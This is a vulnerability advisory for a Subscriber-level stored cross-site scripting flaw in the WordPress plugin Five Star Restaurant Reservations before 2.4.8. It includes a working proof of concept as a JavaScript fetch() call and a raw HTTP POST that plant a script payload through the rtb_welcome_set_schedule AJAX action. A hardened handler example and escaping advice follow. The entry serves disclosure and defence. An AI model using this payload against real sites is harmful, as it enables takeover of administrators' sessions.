Source: wpexploit | Author: Krzysztof Zając | WPEX-ID: 306ECF09-FDF0-449C-930C-9DFA58F0EFC2
Published: Dec 21, 2021 - 12:00 a.m.

Five Star Restaurant Reservations < 2.4.8 - Subscriber+ Stored Cross-Site Scripting


EPSS: 0.001 (Low), percentile 24.8%

The plugin performs neither a capability check nor a CSRF (nonce) check in the rtb_welcome_set_schedule AJAX action, so any authenticated user can call it. Because the submitted schedule data is stored without sanitisation and rendered without escaping, users with a role as low as Subscriber can plant a stored Cross-Site Scripting payload that executes in the browser of a logged-in administrator.

As a subscriber:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"rtb_welcome_set_schedule", "schedule_open": '{"\\"><script>if (!window.alreadyExploited) alert(1); window.alreadyExploited = 1;</script>": {"weekdays":{"wednesday":"1"},"time":{"start":"1:45 AM","end":""}}}'}),
  "method": "POST",
  "credentials": "include"
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 316
Connection: close
Cookie: [any authenticated user]

action=rtb_welcome_set_schedule&schedule_open=%7B%22%5C%22%3E%3Cscript%3Eif+%28%21window.alreadyExploited%29+alert%28%2FXSS%2F%29%3B+window.alreadyExploited+%3D+1%3B%3C%2Fscript%3E%22%3A+%7B%22weekdays%22%3A%7B%22wednesday%22%3A%221%22%7D%2C%22time%22%3A%7B%22start%22%3A%221%3A45+AM%22%2C%22end%22%3A%22%22%7D%7D%7D


The stored payload then executes when an administrator opens the plugin's settings page: https://example.com/wp-admin/admin.php?page=rtb-settings
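To show what the missing checks look like when present, here is a hypothetical hardened handler for this AJAX action (an added illustration, not the plugin's own code; the nonce action name, the option key and the function name are assumptions). Note that the PoC places the payload in a JSON object key, so the handler rebuilds the schedule from allowlisted values and discards the caller's keys entirely:

```php
<?php
// Hypothetical hardened handler for the rtb_welcome_set_schedule AJAX action.
// Added example, not the plugin's code: the nonce action 'rtb_welcome_set_schedule'
// and the option key 'rtb_schedule_open' are assumed names.

add_action( 'wp_ajax_rtb_welcome_set_schedule', 'example_rtb_welcome_set_schedule' );

function example_rtb_welcome_set_schedule() {
    // 1. CSRF check: the request must carry a nonce bound to this action.
    check_ajax_referer( 'rtb_welcome_set_schedule', 'nonce' );

    // 2. Capability check: only users allowed to change settings may proceed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Input validation: parse the JSON and rebuild it from an allowlist
    //    instead of storing the caller's structure (and its keys) verbatim.
    $raw     = isset( $_POST['schedule_open'] ) ? wp_unslash( $_POST['schedule_open'] ) : '';
    $decoded = json_decode( $raw, true );
    if ( ! is_array( $decoded ) ) {
        wp_send_json_error( 'invalid schedule', 400 );
    }

    $allowed_days = array( 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday' );
    $time_re      = '/^(?:(?:0?[1-9]|1[0-2]):[0-5][0-9] [AP]M)?$/'; // "h:mm AM/PM" or empty
    $clean        = array();

    foreach ( $decoded as $rule ) {          // attacker-controlled keys are dropped here
        if ( ! is_array( $rule ) ) {
            continue;
        }
        $days = array();
        foreach ( (array) ( $rule['weekdays'] ?? array() ) as $day => $on ) {
            if ( in_array( $day, $allowed_days, true ) && '1' === (string) $on ) {
                $days[ $day ] = '1';
            }
        }
        $start = sanitize_text_field( $rule['time']['start'] ?? '' );
        $end   = sanitize_text_field( $rule['time']['end'] ?? '' );
        if ( ! preg_match( $time_re, $start ) || ! preg_match( $time_re, $end ) ) {
            continue;                        // reject anything that is not a time
        }
        $clean[] = array( 'weekdays' => $days, 'time' => array( 'start' => $start, 'end' => $end ) );
    }

    update_option( 'rtb_schedule_open', $clean );
    wp_send_json_success( $clean );
}
```

Validation on input is not a substitute for output escaping: when the settings page renders the stored values they should still pass through esc_attr() or esc_html(), so a value that slipped through storage cannot execute in an administrator's browser.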

